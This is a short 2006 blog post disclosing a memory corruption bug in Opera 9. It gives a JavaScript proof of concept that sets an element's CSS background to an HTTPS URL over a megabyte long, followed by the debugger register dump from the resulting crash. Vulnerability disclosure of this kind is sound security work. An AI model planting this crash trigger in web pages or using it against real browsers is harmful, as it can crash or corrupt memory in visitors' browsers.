The following bug was tested on the latest version of Opera 9 on a fully-patched Windows XP SP2 system. A memory corruption issue can be triggered by setting the background property of any DHTML element to a long HTTPS URL.
var a = document.createElement('a');
var b = 'XXXX';
while (b.length <= 1024*1024) b+=b;
a.style.background = 'url(https://' + b + ')';
Demonstration
eax=0c4f0020 ebx=00000000 ecx=0c4f0020
edx=0a4b0030 esi=00953ff8 edi=00200008
eip=67befb98 esp=0012e38c ebp=0012e404
Opera_679e0000+0x20fb98:
67befb98 668b32 mov si,[edx] ds:0023:0a4b0030=0000
This bug will be added to the OSVDB:
Opera CSS Background Property HTTPS Memory Corruption
Wednesday, July 26, 2006
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment